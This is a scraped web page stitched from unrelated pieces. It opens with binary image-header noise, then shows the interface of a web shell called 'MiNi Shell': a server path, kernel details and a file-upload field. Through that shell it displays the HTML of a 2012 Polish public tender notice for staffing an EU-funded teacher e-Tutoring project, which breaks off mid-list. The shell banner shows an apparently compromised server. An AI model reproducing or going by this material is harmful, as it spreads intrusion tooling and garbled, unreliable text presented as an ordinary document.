JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120801/281190-N-2012.html

<p class="kh_header"><b>Częstochowa: Wybór asystenta-tki projektu oraz specjalisty-tki do spraw postępu rzeczowego do projektu systemowego pn. e-Tutoring w wiejskiej szkole, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
Wartość projektu: 725 466,67 PLN.
Nazwa programu: Program Operacyjny Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 281190 - 2012; data zamieszczenia: 01.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Doskonalenia Nauczycieli  WOM w Częstochowie , al. Jana Pawła II 126/130, 42-200 Częstochowa, woj. śląskie, tel. 34 3606004, 3606014, faks 34 3606239.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.womczest.edu.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór asystenta-tki projektu oraz specjalisty-tki do spraw postępu rzeczowego do projektu systemowego pn. e-Tutoring w wiejskiej szkole, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
Wartość projektu: 725 466,67 PLN.
Nazwa programu: Program Operacyjny Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wybór asystenta-tki projektu oraz specjalisty-tki do spraw postępu rzeczowego do projektu systemowego pn. e-Tutoring w wiejskiej szkole, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Priorytet IX. Rozwój wykształcenia i kompetencji w regionach. Działanie 9.4. Wysoko wykwalifikowane kadry systemu oświaty.
2. Zamówienie podzielone zostało na 2 zadania:
Zadanie 1 - wybór asystenta-tki projektu do projektu systemowego pn. e-Tutoring w wiejskiej szkole, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Priorytet IX. Rozwój wykształcenia i kompetencji w regionach. Działanie 9.4. Wysoko wykwalifikowane kadry systemu oświaty.
Zadanie 2 - wybór specjalisty-tki do spraw postępu rzeczowego do projektu systemowego pn. e-Tutoring w wiejskiej szkole, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Priorytet IX. Rozwój wykształcenia i kompetencji w regionach. Działanie 9.4. Wysoko wykwalifikowane kadry systemu oświaty.
3. Opis Projektu: Projekt e-Tutoring w wiejskiej szkole skierowany jest do nauczycieli-ek pracujących czynnie we wszystkich rodzajach szkół na terenie gmin wiejskich i wiejsko-miejskich województwa śląskiego, posiadających wykształcenie wyższe z przygotowaniem pedagogicznym. Celem głównym projektu jest zwiększenie umiejętności posługiwania się narzędziami TIK -technologii informacyjno-komunikacyjnych przez nauczycieli-ki z terenów wiejskich. Celami szczegółowymi projektu są:
a.	Zwiększenie wśród nauczycieli/ek przygotowania do wykorzystania narzędzi MOODLE i Web 2.0 podczas zajęć edukacyjnych. 
b.	Zwiększenie wśród nauczycieli-ek wiedzy teoretycznej i praktycznej na temat nowych środowisk kształcenia - platforma edukacyjna i środowiska społecznościowe. 
c.	Nabycie umiejętności współpracy zespołowej na platformie e-learningowej - dzielenie się zasobami dydaktycznymi, wymiana doświadczeń w celu treningu umiejętności e-Tutora. 
d.	Zwiększenie szans nauczycieli-ek na utrzymanie posiadanego zatrudnienia oraz zdobycie kolejnych stopni awansu zawodowego. Rekrutacja będzie prowadzona online. 
Szkolenia odbywały się będą online w czasie dogodnym dla uczestników. Szkolenia obejmują 
6 modułów:
-	wprowadzenie, 
-	4 moduły merytoryczne: Wykorzystanie platformy e-learningowej w edukacji; Tworzenie bloga i mikrobloga edukacyjnego; Tworzenie szkolnego lub klasowego kanału YouTube; Prowadzenie projektów edukacyjnych z wykorzystaniem narzędzi społecznościowych,
-	ewaluacja. 
Liczba uczestników projektu: 720 osób. 
Miejsce realizacji projektu: woj. śląskie. 
Biuro projektu: Regionalny Ośrodek Doskonalenia Nauczycieli WOM w Częstochowie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 75.12.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wyznacza szczegółowy warunek dla Zadania 1 - Wykonawca warunek spełni, jeżeli wykaże, że posiada doświadczenie przy realizacji projektów POKL EFS na stanowisku asystenta-tki projektu - co najmniej w jednym zakończonym projekcie o wartości nie mniejszej niż 450 000 PLN, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie. 
Dla Zadania 2 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że: Dla Zadania 1 - osoba proponowana do pełnienia funkcji asystenta-tki projektu posiada: 
a.	wykształcenie wyższe prawnicze, administracyjne lub ekonomiczne;
b.	przynajmniej roczny staż pracy w jednostkach samorządu terytorialnego bądź ich komórkach organizacyjnych;
c.	ukończone co najmniej jedno szkolenie lub kurs w zakresie zarządzania projektami unijnymi; 
d.	ukończone co najmniej jedno szkolenie lub kurs w zakresie zasad kwalifikowalności i zasad systemu sprawozdawczości w ramach projektów POKL;
e.	ukończone co najmniej jedno szkolenie lub kurs z zakresu Ustawy Prawo zamówień publicznych.

Dla Zadania 2 - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że osoba proponowana do pełnienia funkcji specjalisty-tki  do spraw postępu rzeczowego posiada:
a.	wykształcenie wyższe z przygotowaniem pedagogicznym, nauczyciel dyplomowany;
b.ukończony kurs lub szkolenie z zakresu metodyki zdalnego nauczania;
c.	ukończony kurs, szkolenie lub studia podyplomowe  w zakresie ochrony danych osobowych;
d.	ukończony kurs lub szkolenie z obsługi narzędzi platformy e-learningowej MOODLE oraz narzędzi społecznościowych w zakresie planowania, projektowania, realizacji i ewaluacji procesu dydaktycznego;
e.	przynajmniej roczny staż pracy w jednostkach samorządu terytorialnego lub w placówkach oświatowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1.	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
2.	gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w szczególności Instytucją Zarządzającą i Pośredniczącą I i II stopnia, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia;
3.	gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia, w szczególności w zakresie sprawozdawczości;
4.	gdy wystąpią obiektywne przeszkody uniemożliwiające realizację zamówienia lub osiągnięcia jego celów według pierwotnie przyjętego harmonogramu realizacji zamówienia;
5.	Wykonawca może dokonać zmiany osoby pełniącej funkcje asystenta/tki projektu lub specjalisty/tki do spraw postępu rzeczowego przedstawionego w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego. Osoba wskazana przez Wykonawcę musi spełniać wszystkie wymogi zawarte w SIWZ.
6.	zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a.	gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży 
w interesie Zamawiającego, 
b.	działania siły wyższej, uniemożliwiającego wykonanie zamówienia w określonym pierwotnie terminie,
c.	wystąpienia obiektywnych czynników niezależnych od Zamawiającego i Wykonawcy.
II.Zmiany umowy przewidziane w ust. 4 dopuszczalne są na następujących warunkach:
1.	zmniejszenia zakresu przedmiotu umowy w granicach uzasadnionego interesu Zamawiającego,
2	w zakresie powodującym zmianę wynagrodzenia Wykonawcy określonego w niniejszej umowie w związku ze zmianą terminu realizacji projektu,
3.	na osoby o kwalifikacjach równorzędnych lub wyższych do kwalifikacji, które podlegały ocenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.womczest.edu.pl -wejście na stronę przez: przez znaczek BIP, zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Doskonalenia Nauczycieli WOM w Częstochowie, Al. Jana Pawła II 126/130; 42-200 Częstochowa -pok. nr 224.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 12:00, miejsce: Oferty należy składać w:  Regionalnym Ośrodku Doskonalenia Nauczycieli WOM w Częstochowie, Al. Jana Pawła II 126;130 w sekretariacie, pok. 206 , II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Priorytet IX. Rozwój wykształcenia i kompetencji w regionach. Działanie 9.4. Wysoko wykwalifikowane kadry systemu oświaty..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wybór asystenta-tki projektu do projektu systemowego pn. e-Tutoring w wiejskiej szkole, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Priorytet IX. Rozwój wykształcenia i kompetencji w regionach. Działanie 9.4. Wysoko wykwalifikowane kadry systemu oświaty..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - wybór asystenta-tki projektu do projektu systemowego pn. e-Tutoring w wiejskiej szkole, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Priorytet IX. Rozwój wykształcenia i kompetencji w regionach. Działanie 9.4. Wysoko wykwalifikowane kadry systemu oświaty.
A.	Wymagania niezbędne:
a.	wykształcenie wyższe prawnicze, administracyjne lub ekonomiczne;
b.	przynajmniej roczny staż pracy w jednostkach samorządu terytorialnego bądź ich komórkach organizacyjnych;
c.	ukończony kurs z zarządzania projektami unijnymi;
d.	doświadczenie przy realizacji projektów POKL EFS na stanowisku asystenta - co najmniej w jednym zakończonym projekcie o wartości nie mniejszej niż 450 000 PLN;
e.	znajomość zasad kwalifikowalności i zasad systemu sprawozdawczości przy realizacji projektów w ramach POKL;
f.	znajomość Ustawy Prawo zamówień publicznych;
g.	biegła znajomość obsługi komputera (Microsoft Office, Internet, poczta elektroniczna);
h.	dyspozycyjność 7 dni w tygodniu;
i.	obywatelstwo polskie;
j.	pełna zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;
k.	brak skazania prawomocnym wyrokiem sądu za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe;
l.	umiejętność zarządzania czasem;
m.	samodzielność, łatwość nawiązywania kontaktów z ludźmi, komunikatywność.
B.	Zakres obowiązków:
a.	zastępowanie koordynatora/ki podczas jego/jej nieobecności;
b.	wsparcie działań koordynatora/ki projektu oraz pomoc w zapewnieniu osiągania celów merytorycznych projektu;
c.	dokonywanie oceny osiąganych wyników; 
d.	przedstawianie koordynatorowi/ce informacji z realizacji projektu; 
e.	monitorowanie potrzeb uczestników projektu; 
f.	doradztwo oraz sprawozdawczość;
g.	sporządzanie załącznika nr 2 wniosków o płatność;
h.	kontrola kosztów projektu pod względem merytorycznym;
i.	przygotowanie umów cywilnoprawnych dla dydaktyków i prelegentów oraz weryfikowanie rachunków przedłożonych do tych umów;
j.	kontakt z Instytucją Pośredniczącą;
k.	przygotowanie i kontrola dokumentacji uczestników;
l.	opracowanie dokumentacji rekrutacyjnej;
m.	prowadzenie wspólnie z koordynatorem/ką projektu procesu rekrutacji;
n.	podział uczestników na grupy oraz przygotowanie list obecności na konferencje;
o.	współpraca z koordynatorem-ką projektu w celu zapewnienia prawidłowego przepływu informacji;
p.	opisywanie dokumentów ,faktur związanych z realizacją projektu, zgodnie z wytycznymi;
q.	opracowanie, w uzgodnieniu z koordynatorem-ką projektu, wzorów dokumentacji projektowej;
r.	przygotowanie materiałów do publikacji końcowej podsumowującej projekt;
s.	prowadzenie bieżącego monitoringu realizacji projektu;
t.	monitorowanie badań ewaluacyjnych;
u.	prowadzenie bieżącej statystyki projektu;
v.	dokonywanie systematycznej kontroli uzyskanych wskaźników i rezultatów;
w.	prowadzenie działań informacyjnych i promocyjnych kierowanych do opinii publicznej;
x.	współpraca z zespołem projektowym w celu realizacji planowanych działań i osiągnięcia zamierzonych rezultatów;
y.	dokumentowanie przebiegu i wyników pracy własnej;
z.	organizowanie , ustalenie harmonogramu, przygotowywanie list obecności oraz uczestniczenie w spotkaniach zespołu projektowego.
C.	Wykonawca zatrudniony będzie na podstawie umowy zlecenia w terminie od podpisania umowy do 30.06.2014 r.
D.	Łączny wymiar zaangażowania asystenta-tki projektu w realizację zadań we wszystkich projektach POKL  nie może przekraczać 240 godzin miesięcznie, łącznie z zaangażowaniem do niniejszego projektu 80 godzin miesięcznie.
E.	Zamawiający wymaga, aby co najmniej 20 godzin w miesiącu ,pn - pt, usługa była świadczona w biurze projektu Regionalnego Ośrodka Doskonalenia Nauczycieli WOM w Częstochowie przy Al. Jana Pawła II 126;130 w godzinach popołudniowych ,15.00 - 17.00,.
F.	W przypadku wykonania pilnych zadań wynikających z harmonogramu istnieje możliwość świadczenia usługi również w soboty, w godzinach wcześniej ustalonych z Zamawiającym.
G.	Asystent-tka projektu nie może być zatrudniony-a w instytucji uczestniczącej w realizacji POKL na podstawie stosunku pracy, chyba, że nie zachodzi konflikt interesów lub podwójne finansowanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wybór specjalisty-tki do spraw postępu rzeczowego do projektu systemowego pn. e-Tutoring w wiejskiej szkole, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionie, Działanie 9.4. Wysoko wykwalifikowane kadry systemu oświaty..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wybór specjalisty-tki do spraw postępu rzeczowego do projektu systemowego pn. e-Tutoring w wiejskiej szkole, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionie, Działanie 9.4. Wysoko wykwalifikowane kadry systemu oświaty.
A.	Wymagania niezbędne:
a.	wykształcenie wyższe z przygotowaniem pedagogicznym, nauczyciel dyplomowany;
b.	kompetencje z zakresu metodyki zdalnego nauczania;
c.	ukończony kurs, szkolenie lub studia podyplomowe  w zakresie ochrony danych osobowych;
d.	bardzo dobra znajomość platformy e-learningowej MOODLE oraz narzędzi społecznościowych w zakresie planowania, projektowania, realizacji i ewaluacji procesu dydaktycznego;
e.	przynajmniej roczny staż pracy w jednostkach samorządu terytorialnego lub w placówkach oświatowych;
f.	biegła znajomość obsługi komputera ,Microsoft Office, Internet, poczta elektroniczna;
g.	znajomość formularza PEFS;
h.	dyspozycyjność 7 dni w tygodniu;
i.	obywatelstwo polskie;
j.	pełna zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;
k.	brak skazania prawomocnym wyrokiem sądu za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe;
l.	umiejętność zarządzania czasem;
m.	samodzielność, łatwość nawiązywania kontaktów z ludźmi, komunikatywność.
B.	Zakres obowiązków:
a.	weryfikacja poprawności merytorycznej i dydaktycznej programu szkolenia i materiałów szkoleniowych  	 opracowanych przez trenerów prowadzących zajęcia;
